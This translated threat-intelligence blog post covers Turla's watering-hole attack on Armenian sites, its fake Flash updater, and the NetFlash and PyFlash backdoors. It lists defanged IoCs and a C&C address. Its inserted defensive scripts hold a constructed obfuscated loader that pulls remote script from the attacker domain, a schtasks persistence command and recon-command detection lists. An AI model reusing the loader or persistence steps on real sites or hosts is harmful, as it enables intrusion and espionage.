[Translation] APT Analysis Report: 05. Turla New Watering Hole Attack Backdoor (NetFlash and PyFlash)

This is a new column created by the author. It mainly translates APT reports from well-known foreign security vendors, so that we can understand their security techniques and learn their methods for tracing APT groups. I hope it will be helpful to you. The previous article shared Kraken, a new fileless APT attack that abuses the Windows Error Reporting service to evade detection. This article introduces Turla's new watering hole attack backdoors (NetFlash and PyFlash). Researchers discovered that Turla launched a watering hole attack against well-known Armenian websites: by forging Adobe Flash updates, victims were tricked into downloading two new pieces of malware, NetFlash and PyFlash. The TTPs of the attack as a whole have barely changed, but Turla used a Python backdoor for the first time.

Insert picture description here



1. What is a watering hole attack

A watering hole attack is one of the classic hacking methods: the attacker sets up a "watering hole" (a trap) on a path the victim must pass through. The most common approach is for the attacker to analyze the regular Internet activity of the target, look for weaknesses in the websites the target frequently visits, compromise such a website first and implant attack code, so that once the target visits the website the attack succeeds. Because this kind of attack relies on a website trusted by the target group, its success rate is very high; even groups that can defend against spear phishing or other forms of phishing are easily deceived.

Insert picture description here

Watering hole attacks are a type of APT attack. Compared with phishing attacks, the attacker does not need to spend effort building a phishing website, but instead exploits weaknesses in legitimate websites, which is more covert. Today, as people's security awareness keeps increasing, a deliberately built phishing website is easily spotted by an attentive user, while a watering hole attack takes advantage of the victim's trust in the website. The watering hole attack uses a weakness of the website to implant attack code, and the attack code exploits flaws in the browser: when the victim visits the website, a malicious program is implanted on the endpoint or important personal information is stolen directly.

Watering hole attacks are more deceptive and more efficient than using social engineering to lure target users to a malicious website. The watering hole method is mainly used for targeted attacks, with 0-day vulnerabilities in Adobe Reader, the Java Runtime Environment (JRE), Flash and IE used to install malware. The following figure shows the basic flow of a watering hole attack.

Insert picture description here

Watering hole attacks are widely used by APT groups such as OceanLotus, Turla and APT-C-01, and mainly exhibit two characteristics:

  • Most of them are APT attacks, and the targets are mostly employees or websites of large and important companies
  • They make heavier use of 0-day vulnerabilities, such as the high-risk Adobe Flash vulnerability CVE-2018-4878

At the end of 2012, the website of the Council on Foreign Relations of the United States suffered a watering hole attack; in early 2013, well-known high-traffic websites such as Apple, Microsoft, the New York Times, Facebook and Twitter were hit one after another. Chinese websites are hardly immune either: in 2013 a Tibetan government website suffered a watering hole attack, and in 2015 well-known Chinese websites such as Baidu and Alibaba also suffered watering hole attacks because of JSONP vulnerabilities.

Insert picture description here

So, how can we defend against watering hole attacks?
Against this type of attack, it is important to educate users so that they are aware of it and of its harm; the more cautious they are when asked to click a link, the better. Secondly, the organization itself must stay vigilant and adopt more advanced methods to detect and counter attacks. At the same time, installing the necessary security software can effectively identify malicious fake software.



2. Turla organization

Turla, also known as Venomous Bear, Waterbug and Uroburos, is one of the most advanced threat groups known to date and is believed to belong to the Russian government (all members of the group speak Russian). Although the group is believed to have been established at least as early as 2007, it was not discovered by Kaspersky Lab until 2014. This is mainly because the group has proven able to use inherent security weaknesses in satellite communications to hide the location of its C&C servers.

We all know that once the location of a C&C server is exposed, the operators behind it are easily spotted. Turla's ability to hide its location is therefore central to its espionage activities. A survey by Kaspersky Lab in 2017 showed that, compared with 2015, Turla had increased the number of its satellite C&C registrations by at least ten times.

Insert picture description here

The famous 1990s cyber espionage operation "Moonlight Maze" is the predecessor of today's Turla APT. The two share many of the same techniques, and both are linked to Russian government hackers. On October 7, 1996, the network of the Colorado School of Mines was hacked: through a vulnerability in the SunOS 4 operating system, the attackers broke into a computer nicknamed "Baby_Doe" in the school's Brown Building and used it as a relay to break into the headquarters of the National Aeronautics and Space Administration, the U.S. Navy and Air Force, and universities and military institutions across the United States.

A joint investigation by several U.S. agencies found that the intruders had obtained a large amount of American classified information, from helmet designs to atmospheric data; stacked up, the printouts would have been as tall as the Washington Monument. As the investigation deepened, the ultimate source was traced to Russian intelligence operatives. Because the intrusions were mostly carried out at night and because of the complexity of the activity, it was named "Moonlight Maze". This intrusion is the first known APT attack in history. Since then, people have realized that cyber espionage and cyber warfare are not just tricks from Hollywood movies but a real thing. "Moonlight Maze" opened the chapter of online espionage and became a classic case in many hacking books.

In network intrusions, attackers generally use relays or jump hosts as proxies to frustrate tracing, and the "Moonlight Maze" intruders were the first to adopt this technique. They used a series of vulnerable computers at universities and libraries in many countries as staging points, stored their attack tools there, and launched attacks from them to confuse investigators.

Insert picture description here

Turla has been active since 2007 and has been behind many notable events. For example, in 2008 it was accused of attacking the U.S. Central Command in the Buckshot Yankee incident, in which a piece of malware named agent.btz was introduced into the Pentagon's military network via a USB flash drive. Another incident occurred in 2016: a large-scale cyber attack on the Swiss defense company RUAG Group, in which Turla used a combination of the Epic Turla espionage software (a branch of the Turla malware family, called "the most complex APT spyware in history"), Trojan programs and rootkit malware. The organizations attacked by Turla go far beyond these, including Ukraine, European Union governments and embassies, research and education organizations, and pharmaceutical and military companies.

According to Kaspersky Lab, Turla has mainly used the following attack tools over the years:

  • IcedCoffee and KopiLuwak
  • Carbon
  • Mosquito
  • WhiteBear
  • LightNeuron

Since 2015, Turla has used JavaScript, PowerShell and WSH in a variety of ways, including downloading and installing malware and implementing complete backdoors. The White Atlas framework typically uses a small JavaScript script, decrypted by VBA macro code, to execute the malware dropper payload and then delete the dropper to erase traces. To drop the Firefox extension backdoor developed by Turla, the White Atlas framework uses a more complex and highly obfuscated JavaScript script, which is still responsible for writing the extension.json extension configuration file and then deleting itself.

So, how is an APT group traced? Here is a brief supplement.

  • Turla APT is closely related to the early worm Agent.BTZ. At the 2015 VirusBulletin conference, Kaspersky researcher Kurt Baumgartner said that Turla APT is closely related to the early worm Agent.BTZ. The hijacking of satellite infrastructure is also very similar to later Turla activity. "Turla logs will generate the same file names as Agent.btz (mswmpdat.tlb, winview.ocx and wmcache.nld) and save them on the compromised system. Turla also uses the same XOR key as Agent.btz to encrypt the log file."
  • The watering hole attack in this article is very similar to Turla's watering hole attacks of the past few years, and the method of operation in particular resembles an attack discovered in 2017. The various JavaScript fragments used there are almost the same as in this attack, but the targets and the payload are different.
  • The KopiLuwak script is decoded by macro code, which is very similar to IcedCoffee. In November 2016, Kaspersky Lab observed a new round of weaponized macro documents. These documents dropped a new, highly obfuscated JavaScript payload, KopiLuwak. The targets of this new tool are the same as those previously targeted by Turla (that is, governments of European countries), but its deployment is more targeted than IcedCoffee's.
  • The "Moonlight Maze" attackers made some subtle mistakes owing to their limited English and their Russian background. For example, while reverse engineering one program, investigators found that the PDB path contained the names Max, Iron and Rinat, who may have been members of the team developing the attack tools. Although these programs may have been compiled on the victim's machine, the three names still appear in the /myprg/, /mytdn/ and /exploits/ paths. It is worth noting that the member named Iron was involved in developing the early client program (cli) of the LOKI2 backdoor. In addition, the Russian word "vnuk", meaning "grandchild" or "grandson", can be found in the PID information of a process that was called twice.

Insert picture description here

Insert picture description here

References:

  • Kaspersky: In-depth exposure of Russian APT organization Turla
  • Kaspersky: Demystifying the reincarnation predecessor of Turla APT


3. Target website

In this attack, Turla compromised at least four Armenian websites, including two government websites, so its targets likely include government officials and politicians. The following sites were compromised:

  • armconsul[.]ru: Consular Section of the Embassy of Armenia in Russia
  • mnp.nkr[.]am: Ministry of Nature Protection and Natural Resources of Artsakh
  • aiisa[.]am: Armenian Institute of International and Security Affairs
  • adgf[.]am: Armenian Deposit Guarantee Fund

ESET research indicates that these sites had been compromised since at least the beginning of 2019. We notified the Armenian National CERT before publication and shared the results of our analysis with them. Turla used its illegitimate access to insert malicious JavaScript code into the websites. For example:

  • For mnp.nkr[.]am, the obfuscated code is appended to the end of jquery-migrate.min.js (a common JavaScript library), as shown in the figure below.

Insert picture description here

This code loads external JavaScript from skategirlchina[.]com/wp-includes/data_from_db_top.php. We analyze this code in the next section. Since the end of November 2019 we have noticed that skategirlchina[.]com no longer distributes the malicious script; Turla may have paused the watering hole attack.
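As an added example (not from the ESET report or the original post), here is a defender-side integrity check for the injection pattern just described: the legitimate jquery-migrate.min.js is compared with the copy the site actually serves, and any appended tail is inspected for script-loader constructs and the external domains it references. The library contents and the injected loader below are constructed stand-ins, not the real samples.

```python
import hashlib
import re

# Constructed stand-in for the site's legitimate jquery-migrate.min.js (not the real file).
CLEAN_JS = (
    b"/*! jQuery Migrate v1.4.1 */\n"
    b"(function(a,b){a.migrateVersion='1.4.1';})(jQuery,window);\n"
)

# Constructed stand-in for the tampered copy: the legitimate file with a loader appended
# to the end, mimicking the pattern reported for mnp.nkr[.]am (string-array obfuscation).
INJECTED_JS = CLEAN_JS + (
    b"var _0x1a=['createElement','script','src',"
    b"'https://skategirlchina.com/wp-includes/data_from_db_top.php','appendChild'];"
    b"var s=document[_0x1a[0]](_0x1a[1]);s[_0x1a[2]]=_0x1a[3];"
    b"document.head[_0x1a[4]](s);"
)

# Domain taken from the report's IoCs; unknown domains are still reported for review.
KNOWN_BAD_DOMAINS = {"skategirlchina.com"}

URL_RE = re.compile(rb"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})[^\s'\"]*")
LOADER_RE = re.compile(rb"createElement|appendChild|eval\(|\.src\b|document\.write")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_library(clean: bytes, served: bytes) -> dict:
    """Compare the copy served by the site with the known-good build.

    Returns a verdict: whether the file was tampered with, how many bytes are
    suspect, which external domains the suspect part references, whether it
    contains script-loading constructs, and whether a known IoC domain was hit.
    """
    verdict = {"tampered": False, "suspect_bytes": 0, "domains": [],
               "loader_hint": False, "known_bad": False}
    if sha256_hex(served) == sha256_hex(clean):
        return verdict
    verdict["tampered"] = True
    # The report describes code appended to the end of the file; if the file was
    # changed elsewhere, fall back to scanning the whole served copy.
    suspect = served[len(clean):] if served.startswith(clean) else served
    verdict["suspect_bytes"] = len(suspect)
    verdict["domains"] = sorted({m.group(1).decode("ascii", "replace").lower()
                                 for m in URL_RE.finditer(suspect)})
    verdict["loader_hint"] = LOADER_RE.search(suspect) is not None
    verdict["known_bad"] = any(d in KNOWN_BAD_DOMAINS for d in verdict["domains"])
    return verdict


if __name__ == "__main__":
    print(check_library(CLEAN_JS, INJECTED_JS))
```

In practice the known-good bytes come from the library vendor's release or from the site's own deployment artifact, and the check runs against what a real visitor receives over HTTPS.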



4. Fingerprinting and delivery chain

After a visit to an infected webpage, skategirlchina[.]com delivers the second-stage malicious JavaScript, which fingerprints the visitor's browser. The following figure shows the main functions of this script.

Insert picture description here

  • First execution of the script
    If this is the first time the user's browser executes the script, it adds an evercookie with a random MD5 value provided by the server, which differs each time the script is served. The evercookie is based on code from GitHub and uses multiple storage locations (such as local databases, Flash Local Shared Objects, Silverlight storage, etc.) to store the cookie value. It is more persistent than a regular cookie, because simply deleting the browser's cookies does not remove it.

  • Second visit to the infected website
    The evercookie is used to identify whether the user has visited an infected website before: on the second visit, the previously stored MD5 value identifies the returning visitor. The script then collects the browser plug-in list, screen resolution and various operating system details and sends them to the C&C server via POST. If there is a reply, it is treated as JavaScript code and executed with eval.

If the attackers are interested in the target, the server replies with JavaScript code that creates an iframe. ESET's data shows that Turla was only interested in a very limited number of visitors in this campaign. The iframe then shows the user a fake Adobe Flash update warning in order to trick them into downloading a malicious Flash installer. The image below shows the fake Adobe Flash update iframe.

Insert picture description here

The researchers did not observe any browser exploitation techniques; this campaign relied only on social engineering. The malicious executable is downloaded from the same server as the iframe's JavaScript. If the user manually launches the executable, both the Turla malware and the legitimate Adobe Flash installer are installed.

The figure below shows the delivery chain of the malicious payload, starting from the initial visit to the compromised Armenian website. The whole process is fairly clear: after the visit to the compromised page, skategirlchina[.]com delivers malicious JavaScript that fingerprints the visitor's browser; the watering hole then lures the victim into clicking the fake Adobe Flash update, which loads both the Turla malware and the legitimate Flash installer to carry out the subsequent attack.

Insert picture description here



5. Malware

When the user executes the fake installer, it will execute Turla malware and the legitimate Adobe Flash installer at the same time. Therefore, the user may think that the update warning is legitimate.

1. Before September 2019: Skipper

Before the end of August 2019, victims received a RAR-SFX archive containing a legitimate Adobe Flash v14 installer and another RAR-SFX archive. The latter contains the various components of the Skipper backdoor. Skipper was previously attributed to Turla and was documented by Bitdefender researchers in 2017, and its latest version was documented by Telsy in May 2019.

Given the small differences between the documented version and the latest one, we do not provide a detailed analysis here. An interesting change is that Skipper's communication module uses the server hosting the campaign's remote JavaScript and malicious binaries as its C&C server, specifically:

  • skategirlchina[.]com/wp-includes/ms-locale.php

2. From September 2019: NetFlash and PyFlash

At the end of August 2019, we noticed a change in the payload delivered by skategirlchina[.]com.

(1) NetFlash (.NET downloader)
A new malicious payload, a .NET program, was discovered at the end of August 2019. It drops the Adobe Flash v32 installer to %TEMP%\adobe.exe and NetFlash (the .NET downloader) to %TEMP%\winhost.exe. Based on the compilation timestamps, the malicious samples were compiled at the end of August and the beginning of September 2019 and then uploaded to the watering hole's C&C server.

NetFlash downloads its second-stage malware from a hard-coded URL and uses a Windows scheduled task to establish persistence for the new backdoor. The following figure shows the main functions of NetFlash, which downloads the second-stage malware called PyFlash. We also found another NetFlash sample, probably compiled at the end of August 2019, with a different hard-coded C&C server:

  • 134.209.222[.]206:15363

Insert picture description here

(2) PyFlash
The second-stage backdoor is a py2exe executable. py2exe is a Python extension that converts Python scripts into standalone Windows executables. As far as we know, this is the first time Turla developers have used Python in a backdoor.

The backdoor communicates with a hard-coded C&C server over HTTP. At the beginning of the script, the C&C URL and the other parameters used to encrypt all network communication (such as the AES key and IV) are defined. The figure below shows the global variables of the PyFlash Python script.

Insert picture description here

The main function of the script (shown in the figure below) sends information about the computer to the C&C server, including the output of OS-related commands (systeminfo, tasklist) and network-related commands (ipconfig, getmac, arp).

Insert picture description here

The C&C server can also send backdoor commands in JSON format. The commands implemented in this version of PyFlash are:

  • Download additional files from a given HTTP(S) link.
  • Execute Windows commands using the Python function subprocess32.Popen.
  • Change the execution delay: modify the period (every X minutes; the default is 5 minutes) of the Windows scheduled task that launches the malware.
  • Uninstall the malware. To acknowledge the instruction, the malware sends a POST request to the C&C server containing the following string.

Insert picture description here

The output of each command is then sent back to the operator via a POST request, encrypted with AES.
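As an added example (not code from the report or the original post), the detection logic below covers two host behaviours described in this section: NetFlash registering a scheduled task that re-launches a binary dropped in %TEMP% (winhost.exe), and PyFlash spawning the systeminfo/tasklist/ipconfig/getmac/arp recon commands from that binary. It runs over constructed Sysmon-style process-creation lines; the line format, user paths and timestamps are assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Recon commands PyFlash runs and reports to its C&C, per the report.
RECON_BINARIES = {"systeminfo.exe", "tasklist.exe", "ipconfig.exe", "getmac.exe", "arp.exe"}
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
EVENT_RE = re.compile(r"^(\S+) ParentImage=(\S+) Image=(\S+)(?: CommandLine=(.*))?$")
WINDOW = timedelta(seconds=60)   # the recon commands run back-to-back on first beacon
MIN_RECON = 3                    # distinct recon tools needed before alerting

# Constructed process-creation events in a simplified Sysmon-like key=value form.
# Paths and times are illustrative; winhost.exe in %TEMP% follows the report.
SAMPLE_EVENTS = r"""
2019-09-02T10:00:00 ParentImage=C:\Windows\explorer.exe Image=C:\Users\a\Downloads\flash_update.exe
2019-09-02T10:00:01 ParentImage=C:\Users\a\Downloads\flash_update.exe Image=C:\Users\a\AppData\Local\Temp\winhost.exe
2019-09-02T10:00:02 ParentImage=C:\Users\a\AppData\Local\Temp\winhost.exe Image=C:\Windows\System32\schtasks.exe CommandLine=schtasks /create /sc minute /mo 5 /tn Update /tr C:\Users\a\AppData\Local\Temp\winhost.exe
2019-09-02T10:05:03 ParentImage=C:\Users\a\AppData\Local\Temp\winhost.exe Image=C:\Windows\System32\systeminfo.exe
2019-09-02T10:05:04 ParentImage=C:\Users\a\AppData\Local\Temp\winhost.exe Image=C:\Windows\System32\tasklist.exe
2019-09-02T10:05:05 ParentImage=C:\Users\a\AppData\Local\Temp\winhost.exe Image=C:\Windows\System32\ipconfig.exe
2019-09-02T10:05:06 ParentImage=C:\Users\a\AppData\Local\Temp\winhost.exe Image=C:\Windows\System32\getmac.exe
2019-09-02T10:05:07 ParentImage=C:\Users\a\AppData\Local\Temp\winhost.exe Image=C:\Windows\System32\ARP.EXE
2019-09-02T11:00:00 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\ipconfig.exe
"""


def parse_events(text: str) -> list:
    """Parse key=value lines into event dicts; lines that do not match are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            ts, parent, image, cmdline = m.groups()
            events.append({"ts": datetime.fromisoformat(ts), "parent": parent,
                           "image": image, "cmdline": cmdline or ""})
    return events


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    alerts, by_parent = [], defaultdict(list)
    for ev in events:
        by_parent[ev["parent"]].append(ev)
        # Rule 1: schtasks /create whose task action points at a binary under %TEMP%.
        cmd = ev["cmdline"]
        if basename(ev["image"]) == "schtasks.exe" and "/create" in cmd.lower() and TEMP_RE.search(cmd):
            alerts.append({"rule": "temp_binary_scheduled_task", "parent": ev["parent"], "at": ev["ts"]})
    # Rule 2: a process running from %TEMP% spawning a burst of distinct recon commands.
    for parent, evs in by_parent.items():
        if not TEMP_RE.search(parent):
            continue
        recon = sorted((e["ts"], basename(e["image"])) for e in evs if basename(e["image"]) in RECON_BINARIES)
        for i, (start, _) in enumerate(recon):
            seen = {name for ts, name in recon[i:] if ts - start <= WINDOW}
            if len(seen) >= MIN_RECON:
                alerts.append({"rule": "recon_burst", "parent": parent, "at": start, "commands": sorted(seen)})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The lone ipconfig run from cmd.exe at the end of the sample is deliberately not flagged: the burst rule needs several distinct recon tools from a parent that lives in %TEMP%.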



6. Conclusion

Turla still regards watering hole attacks as one of its initial intrusion strategies. This attack relies on social engineering, using a fake Adobe Flash update warning to trick users into downloading and installing malware. On the other hand, the payload has changed, possibly to evade detection: the malicious payload is now NetFlash, which installs a backdoor named PyFlash, developed in Python.

We will continue to monitor Turla's new activities and post relevant information on our blog. If you have any questions, please contact us at threatintel [@] eset.com. The IoCs can also be found in our GitHub repository.

IoCs:

  • Compromised website

Insert picture description here

  • C&C server

Insert picture description here

Samples:

Insert picture description here

MITRE ATT&CK techniques

  • In a follow-up, the author will share an article detailing the application of the ATT&CK framework to APT groups

Insert picture description here

Finally, I hope this article is helpful to you. I feel that Python backdoors and watering hole attacks are quite interesting; you can try to reproduce the related functionality later if you are not busy. Today is 1024. I still like the article "The Ten Years of CSDN and Me" from a year ago. How many decades are there in a life! The laboratory has been crazy recently, and today I can finally go home to be with my goddess. The road is long, so keep going, cherish the moment, and get ready to go home~ This article was written on high-speed train G401, come on!

Insert picture description here

Previous share:

The "Nazhang AI Security Home" column, opened on August 18, 2020, mainly focuses on Python big data analysis, cyberspace security, reverse analysis, APT analysis reports, artificial intelligence, Web penetration testing, and offensive and defensive techniques. It will also share algorithm implementations from CCF, SCI and Chinese core-journal papers. Nazhang's House will be more systematic: it will reconstruct all of the author's articles, explaining Python and security from scratch. Having written articles for nearly ten years, I really want to share what I have learned and felt. I also sincerely invite your advice and your attention! Thank you.

Insert picture description here

(By: Eastmount 2020-10-24, written on the high-speed rail at 8pm on Saturday, http://blog.csdn.net/eastmount/ )


Origin blog.csdn.net/Eastmount/article/details/109248019